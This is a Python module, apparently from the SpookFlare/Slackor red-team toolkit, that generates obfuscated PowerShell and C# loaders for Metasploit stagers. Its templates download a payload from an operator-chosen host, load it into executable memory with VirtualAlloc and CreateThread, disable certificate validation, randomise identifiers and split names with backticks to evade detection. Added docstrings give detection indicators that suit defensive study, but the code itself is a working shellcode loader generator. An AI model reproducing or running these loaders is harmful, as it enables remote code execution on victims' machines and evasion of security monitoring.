github.com/Coalfire-Research/Slackor@v0.0.0-20191010164036-aa32a7f9250b/SpookFlare/lib/sfmpps.py (about)

     1  # -*- coding: utf-8 -*-
     2  import random
     3  import string
     4  import base64
     5  from base64 import b64encode
     6  
def randomString():
    """Return a 12-character name made of random ASCII letters.

    The generator functions in this file call this once per template slot,
    so every identifier in the emitted PowerShell/C# differs between runs.
    Defenders should therefore key on the structure of the generated code,
    not on variable or class names.
    """
    letters = string.ascii_letters
    picked = []
    for _ in range(12):
        picked.append(random.choice(letters))
    return ''.join(picked)
     9  
def checksum8(s):
    """Return the sum of the code points of *s*, reduced modulo 256."""
    total = 0
    for ch in s:
        total += ord(ch)
    return total % 0x100
    12  
def genHTTPChecksum():
    """Return a random 4-character alphanumeric path whose checksum8 is 92.

    Makes up to 64 attempts. Each attempt samples three distinct characters
    and then searches a shuffled alphabet for a fourth that brings the 8-bit
    sum to 92. Returns None implicitly if every attempt fails; the caller in
    this file concatenates the result to a string without checking for that.

    Detection note: 92 appears to match the checksum the Metasploit HTTP(S)
    handlers use to recognise a Windows stager request (confirm against the
    handler in use). A request for a four-character alphanumeric path with
    this checksum is therefore a useful network indicator, even though the
    path text itself changes on every run.
    """
    alphabet = string.ascii_letters + string.digits
    for _ in range(64):
        prefix = "".join(random.sample(alphabet, 3))
        # Sorting on a random key is the original's way of shuffling.
        shuffled = sorted(alphabet, key=lambda _ch: random.random())
        for tail in shuffled:
            candidate = prefix + tail
            if checksum8(candidate) == 92:
                return candidate
    return None
    21                  
def generateMPPSLoader(mpProto, mpLhost, mpLport, mpArch, mpSsize):
    """Render the PowerShell loader template and return it as a string.

    The returned script downloads a byte array over HTTP(S), skips its first
    ``mpSsize`` bytes, copies the rest into newly allocated memory and starts
    a thread at that address. Nothing is executed or written to disk by this
    function itself; it only builds text.

    Args:
        mpProto: URL scheme. The value "https" also emits a line that
            disables server-certificate validation in the generated script.
        mpLhost: Host part of the download URL (string-concatenated).
        mpLport: Port part of the download URL; must already be a str
            because it is joined with ``+``.
        mpArch: "x86" or "x64"; selects the IntPtr conversion method and the
            unsigned integer type used in the P/Invoke signatures.
        mpSsize: Number of leading bytes of the download that the generated
            script skips before copying.

    Returns:
        The formatted PowerShell source text.

    Detection notes (all visible in the template below):
        * Add-Type compiling kernel32 P/Invoke signatures for VirtualAlloc,
          CreateThread and WaitForSingleObject from inside PowerShell.
        * VirtualAlloc called with 0x3000 / 0x40, i.e. a committed
          read-write-execute region, followed by Marshal.Copy into it.
        * A fixed User-Agent and Accept-Language header pair on the request.
        * Cmdlet and type names split with backticks; strip backticks before
          matching script-block log text.
        * ServerCertificateValidationCallback forced to $true (https only).
    """
    if mpArch == "x86":
        mpArch = "ToInt32"
        mpDef = "UInt32"
    elif mpArch == "x64":
        mpArch = "ToInt64"
        mpDef = "UInt64"
    # NOTE(review): there is no else branch; any other mpArch value leaves
    # mpDef unbound and the format() call below raises.

    if mpProto == "https":
        # Replaces the process-wide validation callback with one that always
        # returns true, so any certificate is accepted by the generated script.
        mpPSSSLChk = "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}"
    else:
        mpPSSSLChk = ""

    # Download URL: scheme://host:port/<4-char path from genHTTPChecksum()>.
    loaderHost = mpProto+"://"+mpLhost+":"+mpLport+"/"+genHTTPChecksum()
    # Template slots: {0} member-definition variable, {1} web client variable,
    # {2} downloaded bytes, {3} trimmed buffer, {4} mpSsize, {5} Add-Type
    # result, {6} allocated pointer, {7} ToInt32/ToInt64, {8} UInt32/UInt64,
    # {9} loaderHost, {10} optional certificate-validation line.
    # WaitForSingleObject is declared but not called; the script ends with a
    # long Start-Sleep instead.
    baseMetPs = '''${0} = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, {8} dwSize, {8} flAllocationType, {8} flProtect);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, {8} dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, {8} dwCreationFlags, IntPtr lpThreadId);
[DllImport("kernel32.dll")] public static extern {8} WaitForSingleObject(IntPtr hHandle, {8} dwMilliseconds);
"@;
{10}
${1} = New-Object "`N`et.`W`ebc`l`i`ent";${1}.Headers.Add("User-Agent", "Mozilla/5.0 (compatible; MSIE 11.0; Trident/7.0; rv:11.0)");${1}.Headers.Add("Accept", "*/*");${1}.Headers.Add("Accept-Language", "en-gb,en;q=0.5");[Byte[]] ${2} = ${1}."D`o`wn`l`oa`d`Data"("{9}");${3} = New-Object byte[] (${2}.Length - {4});[Array]::Copy(${2}, {4}, ${3}, 0, (${2}.Length - {4}));${5} = A`d`d-T`y`p`e -memberDefinition ${0} -Name "Win32" -namespace `W`in`3`2`F`un`ct`i`on`s -passthru;${6}=${5}::VirtualAlloc(0,${3}.Length,0x3000,0x40);[Runtime.InteropServices.Marshal]::Copy(${3}, 0, [IntPtr](${6}.{7}()), ${3}.Length);${5}::CreateThread(0,0,${6},0,0,0) | oUT-NuLl;`S`T`A`R`T-`S`l`e`E`p -s `8`6`4`2`0'''

    # Seven slots receive fresh random names, so identifiers differ per build.
    loaderFinal = baseMetPs.format(randomString(), randomString(), randomString(), randomString(), mpSsize, randomString(), randomString(), mpArch, mpDef, loaderHost, mpPSSSLChk)
    return loaderFinal
    46  
def generateMPPSCsharpLoader(mpPsCode):
    """Render a C# source file that runs *mpPsCode* in a hosted PowerShell runspace.

    The generated class decodes an embedded Base64 literal to a UTF-8 string,
    opens a runspace, adds the string to a pipeline with AddScript and
    invokes it. Only source text is produced here; nothing is compiled or run.

    Args:
        mpPsCode: PowerShell script text (str) to embed.

    Returns:
        The formatted C# source text.

    Detection notes:
        * The resulting program runs PowerShell through
          System.Management.Automation rather than by starting
          powershell.exe, so process-name rules do not see it. Watch for
          that assembly loading into processes that are not PowerShell
          hosts.
        * The script is handed to AddScript in clear text after decoding, so
          script-block logging and AMSI (where enabled) still receive it.
        * Class and variable names are random per build (see randomString).
    """
    # Slots {0}-{5} are random identifiers; {6} is the encoded script.
    # The RunspaceInvoke object in slot {4} is created but not otherwise
    # used by the template.
    mCsharpCode = '''using System;
using System.IO; using System.Diagnostics; using System.Reflection; using System.Runtime.InteropServices; using System.Collections.ObjectModel; using System.Management.Automation; using System.Management.Automation.Runspaces; using System.Text;     
public class {0} {{
    public static void Main() {{
        byte[] {1} = Convert.FromBase64String("{6}");
        string {2} = Encoding.UTF8.GetString({1});
        Runspace {3} = RunspaceFactory.CreateRunspace();
        {3}.Open();
        RunspaceInvoke {4} = new RunspaceInvoke({3});
        Pipeline {5} = {3}.CreatePipeline();
        {5}.Commands.AddScript({2});
        {5}.Invoke();
        {3}.Close();
        return;
    }}
}}'''

    # NOTE(review): b64encode() returns bytes on Python 3 and str.format()
    # renders bytes through repr, so the literal in slot {6} may not be plain
    # Base64. Confirm against real samples before writing a content signature.
    loaderFinal = mCsharpCode.format(randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), b64encode(mpPsCode.encode()))
    return loaderFinal